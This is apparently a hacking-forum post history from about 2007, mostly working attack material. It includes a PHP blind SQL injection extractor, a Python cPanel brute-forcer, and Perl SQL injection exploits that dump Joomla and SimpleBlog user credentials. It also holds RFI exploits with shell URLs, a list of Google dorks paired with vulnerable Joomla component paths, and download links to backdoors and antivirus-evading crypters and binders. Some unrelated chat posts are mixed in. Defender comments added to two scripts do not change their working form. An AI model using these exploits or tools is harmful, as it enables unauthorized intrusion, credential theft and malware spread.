$sp, $result)) { while ($i<=$cmax) { $check = "=$i"; if (!empty($result)) $status = "(".$result.")"; echo "<script>InsertText('Now checking $check $status');</script>"; flush(); if (check($check, $sp, $result)) { $result .= chr($i); $sp++; if (!isset($ot) || !isset($do)) { $ot = 97; $do = 122; } found($ot, $do, $sp, $result); } $i++; } if (((empty($result)) && ($sp == 2)) or (empty($result))) { echo "<script>InsertText('Failed!');</script>"; flush(); die; } else { if (isset($output)) save_result("\n Query ".$query." - ".$result."\n"); echo "<script>InsertText('Not full result ($result). 
Try to increase the range of chars.');</script>"; flush(); die("</tr></td></table></body></html>"); } } if (((empty($result)) && ($sp == 2)) or (empty($result))) { echo "<script>InsertText('Failed!');</script>"; flush(); die; } else die("<script>InsertText('Done!');</script><Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%><Tr><Td><Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%><Tr><Td>[b]$query[/b] - $result</Td></Tr></Table></Td></Tr></Table></body></html>"); } function check($check, $sp, $result) { global $path, $host, $param, $query, $string; $packet = "GET ".$path."?".$param."%20AND%20ascii(lower(substring(".urlencode($query).",".$sp.",1)))".$check." HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $html = sendpacket($packet); if (strpos($html,$string) > 0) return 1; return 0; } function mode4($url, $string, $query, $ot, $do) { global $log, $proxy, $host, $path, $param; echo "<Form name=\"speed\"><Input Type=\"text\" Name=\"text\" Value=\"\" size=100 class=speed DISABLED=yes></Form>"; flush(); found($ot, $do, 1, ""); } if (($mode_post == 2) || ($mode_post == 3) ) echo "<script>InsertText('Completed - 100%');</script>"; echo "</Td></Tr></Table></body></html>"; flush(); ?>
  5. #!usr/bin/python import threading, time, random, sys, urllib2, httplib, base64 from copy import copy def title(): print "\n\t d3hydr8[at]gmail[dot]com cPanel BruteForcer v1.0" print "\t-----------------------------------------------------\n" def timer(): now = time.localtime(time.time()) return time.asctime(now) if len(sys.argv) !=5: title() print "\nUsage: ./cPanelbrute.py <server> <port> <userlist> <wordlist>\n" print "ex: python cPanelbrute.py example.com 2082 users.txt wordlist.txt\n" sys.exit(1) try: users = open(sys.argv[3], "r").readlines() except(IOError): print "Error: Check your userlist path\n" sys.exit(1) try: words = open(sys.argv[4], "r").readlines() except(IOError): print "Error: Check your wordlist path\n" sys.exit(1) wordlist = copy(words) def reloader(): for word in wordlist: words.append(word) def getword(): lock = threading.Lock() lock.acquire() if len(words) != 0: value = random.sample(words, 1) words.remove(value[0]) else: print "\nReloading Wordlist - Changing User\n" reloader() value = random.sample(words, 1) users.remove(users[0]) lock.release() if len(users) ==1: return users[0], value[0][:-1] else: return users[0][:-1], value[0][:-1] def getauth(url): req = urllib2.Request(url) try: handle = urllib2.urlopen(req) except IOError, e: pass else: print "This page isn't protected by basic authentication.\n" sys.exit(1) if not hasattr(e, 'code') or e.code != 401: print "\nThis page isn't protected by basic authentication." 
print 'But we failed for another reason.\n' sys.exit(1) authline = e.headers.get('www-authenticate', '') if not authline: print '\nA 401 error without a basic authentication response header - very weird.\n' sys.exit(1) else: return authline class Worker(threading.Thread): def run(self): username, password = getword() try: print "-"*12 print "User:",username,"Password:",password auth_handler = urllib2.HTTPBasicAuthHandler() auth_handler.add_password("cPanel", server, base64encodestring(username)[:-1], base64encodestring(password)[:-1]) opener = urllib2.build_opener(auth_handler) urllib2.install_opener(opener) urllib2.urlopen(server) print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n" except (urllib2.HTTPError, httplib.BadStatusLine), msg: #print "An error occurred:", msg pass title() if sys.argv[1][-1] == "/": sys.argv[1] = sys.argv[1][:-1] server = sys.argv[1]+":2082" if sys.argv[2].isdigit() == False: print "[-] Port must be a number\n" sys.exit(1) else: port = sys.argv[2] if sys.argv[1][-1] == "/": sys.argv[1] = sys.argv[1][:-1] server = sys.argv[1]+":"+port print "[+] Server:",server print "[+] Port:",port print "[+] Users Loaded:",len(users) print "[+] Words Loaded:",len(words) print "[+]",getauth(server) print "[+] Started",timer(),"\n" for i in range(len(words)*len(users)): work = Worker() work.setDaemon(1) work.start() time.sleep(1) print "\n[-] Done -",timer(),"\n"
  6. It's called "SQLRIP" and it's for ripping informations like the username, mail address and the hash from an SQL Database. It supports phpBB, Woltlab Burning Board, Simple Machines Forum, vBulletin, PHPKit and webspell. Download: http://rapidshare.com/files/51383363/SQLRIP.rar
  7. Vedeti ca in arhiva este un fisier .txt, cititi ce scrie in el. Eu nu am inteles mai nimic... cum sa folosesc... daca intelegeti careva si testati sa imi explicati si mie daca vreti. Download: http://rapidshare.com/files/51381520/VNC_Mini-Backdoor.rar
  8. #!/usr/bin/perl -w
     # (C)oded by illuz1oN
     #
     # Proof-of-concept, as posted, for a SQL injection through the `did` query
     # parameter of index.php?option=com_eventlist&func=details.
     #
     # What the script does: reads a base URL from STDIN, sends a single GET
     # request whose `did` value carries a UNION SELECT against `jos_users`,
     # then prints the first 32-character run it finds in the response body.
     #
     # Review notes for defenders:
     #   * The request can only succeed if the component places `did` into its
     #     SQL text unmodified (the component source is not shown here; inferred
     #     from the payload). Casting `did` to an integer or binding it as a
     #     query parameter removes this class of bug.
     #   * In web-server logs the request stands out: `option=com_eventlist`
     #     combined with `union%20select`, `jos_users` and an out-of-range
     #     numeric `did` in the query string.
     #   * The two char(...) lists decode to the labels "username:" and
     #     " password:", which appear in the response next to the column values
     #     and can serve as a response-side signature.
     #   * NOTE(review): the `jos_` table prefix suggests a Joomla-style install
     #     with the default prefix; confirm against the target product.
     use LWP::UserAgent;

     {
         print "[*]Site To Attack: ";
         # Base URL comes straight from standard input and is interpolated into
         # the request URL without validation. $site is a package global; the
         # script does not enable `use strict`.
         chomp($site=<STDIN>);
         # Indirect-object call; same constructor as LWP::UserAgent->new.
         my $www = new LWP::UserAgent;
         # The trailing `/*` opens a SQL comment, presumably so the remainder of
         # the component's own statement is ignored by the database.
         my $exploit="$site/index.php?option=com_eventlist&func=details&did=9999999999999%20union%20select%200,0,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*";
         my $xpl = $www->get($exploit) or vuln();
         # Matches the first run of 32 characters from [0-9,a-f] (the class also
         # admits a literal comma). 32 hex digits is the length of an MD5
         # digest, presumably the stored password hash; verify against the
         # schema. If no such run is present, vuln() reports and exits.
         $xpl->content()=~/([0-9,a-f]{32})/ or vuln();
         print "\n[*]Hash Is: $1\n";
     }

     # Prints the "Site Was Not Vulnerable" banner and terminates the script.
     sub vuln {
         print qq[\n/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/ /~~~~~~~~~Site Was Not Vulnerable~~~~~~~/ /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/ ];
         exit;
     }
  9. click dreapta pentru a vedea meniul... deocamdata este 100% nedetectabil. Download: http://rapidshare.com/files/51088659/Useless.rar
  10. :::::::::::::::::::::::::::::::::::::::::::::::::::..................... .. : \ | (_) | \ | | / ____| : \| |_ ___ ___ | \| | __ _ _ __ ___ ___ | | _ __ _____ __ : . ` | |/ __/ _ \ | . ` |/ _` | '_ ` _ \ / _ \ | | | '__/ _ \ \ /\ / / : |\ | | (_| __/ | |\ | (_| | | | | | | __/ | |____| | | __/\ V V / :_| \_|_|\___\___| |_| \_|\__,_|_| |_| |_|\___| \_____|_| \___| \_/\_/ :::::::::::::::::::::::::::::We got the nicest name in the security scene! ::::::::Info::. ::Script: phpress ::Version: 0.2.0 ::Homepage:[url]http://sourceforge.net/projects/phpress/[/url] :: :::::::::Details::. ::Type: Remote_File_Inclusion ::Dork: allinurl:/phpress/ ::Exploit: [url]http://host/phpress/adisplay.php?lang=shell[/url] :: :: ::Variable lang is not defined :: ::::::::::::::::::::::::::::::::. :::::::::::Additional_Information::. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::. ::Contact: cerbelum@xxxxxxxxx ::Website: none yet :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.
  11. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++ SPIP v1.7 Remote File Inclusion Bug ! ++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ------------------------------------------------------------------------------------ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ ++DORK : "/SPIP-v1-7-2/" ++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +----------------------------------------------------------------------------------+ +----------------------------------------------------------------------------------+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ ++ Bug in : "SPIP-v1-7r/inc-calcul.php3" ++---------------------------------------------------------------------------------- ++ Vlu Code: ----------------------------- ++ || include($squelette_cache); || ++ ----------------------------- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ ++================================================================================== ++ Exploit : ++ ++ [url]http://sitename.com/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=http://SHELLURL?[/url] ++ ++================================================================================== ++ +++++++++++++++++++++|Discoverd By :Darkdewil[system-errrror]|++++++++++++++++++++++ ++ ++ ++++++++++++++++++|Conatact : system-errrror[at]hotmail[dot]com |+++++++++++++++++++ ++ ++ ++++++++++++|Thx To :Cazanova & fedaiturk & n3twork & codes & by_Ka0s |+++++++++++++ ++ ++ ++++++++++++++++++++++++|sPECial THanks to :1923turk - grup|++++++++++++++++++++++++ ++ ++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  12. Ras

    Sunt prost

    nemessis ce ai tata? ai baut? mai gresesc si oamenii EDIT ti s-a pus pata pe tine.
  13. inurl:"com_flyspray" Site Sonuna: /components/com_flyspray/startdown.php?file=shell Google Dork: inurl:"com_admin" Site Sonuna: administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell Google Dork: inurl:index.php?option=com_simpleboard Site Sonuna: /components/com_simpleboard/file_upload.php?sbp=shell Google Dork: inurl:"com_hashcash" Site Sonuna: /components/com_hashcash/server.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_htmlarea3_xtd-c" Code: /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_sitemap" Code: /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_performs" Site Sonuna: components/com_performs/performs.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_forum" Site Sonuna: /components/com_forum/download.php?phpbb_root_path= Google Dork: inurl:"com_pccookbook" Site Sonuna: components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell Google Dork: inurl:index.php?option=com_extcalendar Site Sonuna: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell Google Dork: inurl:"minibb" Site Sonuna: components/minibb/index.php?absolute_path=shell Google Dork: inurl:"com_smf" Site Sonuna: /components/com_smf/smf.php?mosConfig_absolute_path= Site Sonuna2: /modules/mod_calendar.php?absolute_path=shell Google Dork: inurl:"com_pollxt" Site Sonuna: /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_loudmounth" Site Sonuna: /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_videodb" Site Sonuna: /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shell Google Dork: inurl:index.php?option=com_pcchess Site Sonuna: /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_multibanners" Site Sonuna: 
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_a6mambohelpdesk" Site Sonuna: /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shell Google Dork: inurl:"com_colophon" Site Sonuna: /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_mgm" Site Sonuna: administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_mambatstaff" Site Sonuna: /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_securityimages" Site Sonuna: /components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell Site Sonuna2: /components/com_securityimages/lang.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_artlinks" Site Sonuna: /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_galleria" Site Sonuna: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_akocomment" Site Sonuna: /akocomments.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_cropimage" Site Sonuna: administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell Google Dork: inurl:"com_kochsuite" Site Sonuna: /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_comprofiler" Site Sonuna: administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_zoom" Site Sonuna: /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell Site Sonuna2: /components/com_zoom/includes/database.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_serverstat" Site Sonuna: /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_fm" Site Sonuna: 
components/com_fm/fm.install.php?lm_absolute_path=shell Google Dork: inurl:com_mambelfish Site Sonuna: administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell
  14. Ras

    hmm masina

    clar audi
  15. Si versiunea unpaked Download: http://rapidshare.com/files/50142975/SkD_Undetectabler_v3__unpaked_.rar scuze ca fac dublu post.
  16. Ras

    ziua

    la multi ani
  17. hnLab-V3 2007.8.18.0 2007.08.17 - AntiVir 7.4.1.62 2007.08.17 - Authentium 4.93.8 2007.08.17 - Avast 4.7.1029.0 2007.08.17 - AVG 7.5.0.484 2007.08.17 - BitDefender 7.2 2007.08.17 - CAT-QuickHeal 9.00 2007.08.17 - ClamAV 0.91 2007.08.18 - DrWeb 4.33 2007.08.18 - eSafe 7.0.15.0 2007.08.16 - eTrust-Vet 31.1.5069 2007.08.18 - Ewido 4.0 2007.08.17 - FileAdvisor 1 2007.08.18 - Fortinet 2.91.0.0 2007.08.18 - F-Prot 4.3.2.48 2007.08.17 - F-Secure 6.70.13030.0 2007.08.17 - Ikarus T3.1.1.12 2007.08.17 - Kaspersky 4.0.2.24 2007.08.18 - McAfee 5100 2007.08.17 - Microsoft 1.2803 2007.08.18 - NOD32v2 2469 2007.08.18 - Norman 5.80.02 2007.08.17 - Panda 9.0.0.4 2007.08.17 - Prevx1 V2 2007.08.18 - Rising 19.36.50.00 2007.08.18 - Sophos 4.20.0 2007.08.12 - Sunbelt 2.2.907.0 2007.08.18 - Symantec 10 2007.08.18 - TheHacker 6.1.8.170 2007.08.17 - VBA32 3.12.2.2 2007.08.17 - VirusBuster 4.3.26:9 2007.08.17 - Webwasher-Gateway 6.0.1 2007.08.17 - Download: http://rapidshare.com/files/50116289/aver.rar
  18. Shot at 2007-08-20 Download: http://rapidshare.com/files/50112070/Aholic_Binder_FullyUndetected.rar
  19. 14 Sep 2006 << topicul este cam vechi
  20. ############################################### ### GetMyOwnArcade (search.php) ($query) SQL-Injection ############################################### ### Discovered By: RoXur777 ### ***August 11th 2007 ### Google-Dork: "Powered by GetMyOwnArcade" ############################################### /* * $query is not being filtered before getting passed to a query. * Therefore, we can inject SQL code into the SQL-Query. * Using UNION-SELECT we can obtain member information. */ ### ## #Straight-Forward: ##################### ### POST ### search.php ###"query=')/**/union/**/select/**/0,0,0,username,0,0,0,0,0,password,0,0,0,0,0,0,0,0/**/from/**/getmyown_user/*" ##################### ### ## # If you did not understand the Straight-Forward version of the exploit then read this: ### # 1) Use the search function on a GetMyOwnAracde site. (They are not always visible on index.php) 2) In the search field type: # ####### ')/**/union/**/select/**/0,0,0,username,0,0,0,0,0,password,0,0,0,0,0,0,0,0/**/from/**/getmyown_user/* ####### # 3) Click Enter. 4) If exploitation was successful you should see usernames and passwords instead of the search results. --- However if you see: # ####### Game search result for \')/**/union/**/....... ####### # That means that the exploit failed. #
  21. Download: http://rapidshare.com/files/50045225/SkDUndetectabler3.rar
  22. ia-l cu un download manager... damn nu mi-a trecut prin cap ;D
  23. am intrat pe link-ul ala si imi arata multe caractere sau ce or fii alea M?!TwQ?OkjN??;?p"?3?-^q p?-???%@?K?X?Wcl?PN?6H,x????'D?s?ak??vdh6] ? ?2/ ??}t?ky??$???e?>%??`=??V??ic?Xq^??0z~>S?&P?+?e^?L?uv 8hS?[?VaELF?m??<?l?NPiti2X=y!????k??'v?o".???E? +??
  24. Ras

    Hi !

    salut. daca ai nevoie de ajutor da-mi pm
  25. #!/usr/bin/perl
      #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
      # SimpleBlog <= 3.0 [ comments_get.asp ]                         #
      # ] Remote SQL Injection [                                       #
      #                                                                #
      # [c]ode by TrinTiTTY [at] g00ns.net                             #
      # Vulnerability by MurderSkillz                                  #
      #                                                                #
      # shoutz: murderskillz, z3r0, kat, str0ke, wicked, clorox        #
      # ch0wn, a59, sess, bernard, + the rest of g00ns                 #
      # [irc.g00ns.net] [www.g00ns.net] [ts.g00ns.net]                 #
      #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
      #
      # Proof-of-concept, as posted, for a SQL injection through the `id`
      # parameter of comments_get.asp in SimpleBlog <= 3.0 (per the banner).
      #
      # What the script does: takes a host (without scheme) as its only
      # argument, requests comments_get.asp with a UNION ALL SELECT that
      # reads uUSERNAME and uPASSWORD from T_USERS, and scrapes the
      # returned HTML with two regular expressions.
      #
      # Review notes for defenders:
      #   * The request depends on `id` reaching the SQL statement
      #     unvalidated (application source not shown; inferred from the
      #     payload). Restricting `id` to an integer and using
      #     parameterised commands removes this class of bug.
      #   * Log signature: requests to comments_get.asp whose `id` holds a
      #     negative number followed by `union%20all%20select` and the
      #     table name `T_USERS`.
      #   * The script labels the value taken from uPASSWORD as "Admin
      #     password". Whether that column holds plaintext or a hash is
      #     not shown here; in either case the credentials should be
      #     treated as exposed and rotated after such a request succeeds.
      use LWP::UserAgent;

      # One-element array slice; yields the first command-line argument.
      $host = @ARGV[0];
      $ua = LWP::UserAgent->new;
      # Relative URL with the injected `id` value; appended to the host below.
      my $inject = 'comments_get.asp?id=-99%20union%20all%20select%201,2,uUSERNAME,4,uPASSWORD,6,7,8,9%20from%20T_USERS';

      # Dispatch: no argument -> banner and usage; argument containing
      # "http://" -> refuse and exit; otherwise run the request.
      if (@ARGV < 1){&top( );&usage( )}
      elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );}
      else { &xpl( ) }

      # Sends the single GET request and prints whatever the two patterns
      # capture from the response body.
      sub xpl( ) {
          &top( );
          print "\n [~] Connecting\n";
          $res = $ua->get("http://$host/$inject");
          $con = $res->content;
          print "\n [~] Checking for admin info\n";
          # Captures up to 15 characters from [-_+.\w] that precede a
          # closing </strong> tag; pattern reproduced exactly as posted.
          if ($con =~ /[b]([-_+.\w]{1,15})<\/strong>/gmi) {
              print "\n\t [+] Admin user: $1\n";
          }
          # Captures the link text of an anchor opened in a new window; the
          # second group is what the script reports as the password.
          if ($con =~ /<a href\=\"http:\/\/(.*)\" target\=\"\_blank\">(.*)<\/a>/gmi) {
              print "\n\t [+] Admin password: $2\n";
              print "\n [+] Complete\n";
          }
          else {
              print "\n [-] Unable to retrieve admin info\n";
              exit(0);
          }
      }

      # Prints the tool banner.
      sub top( ) {
          print q { ################################################################## # SimpleBlog <= 3.0 [ comments_get.asp ] # # ] Remote SQL Injection [ # # # # [c]ode by TrinTiTTY [at] g00ns.net # # Vulnerability by MurderSkillz # ################################################################## }
      }

      # Prints usage text and exits with status 0.
      sub usage( ) {
          print "\n Usage: perl simpleblog3.pl <host>\n";
          print "\n Example: perl simpleblog3.pl www.example.com/path\n\n";
          exit(0);
      }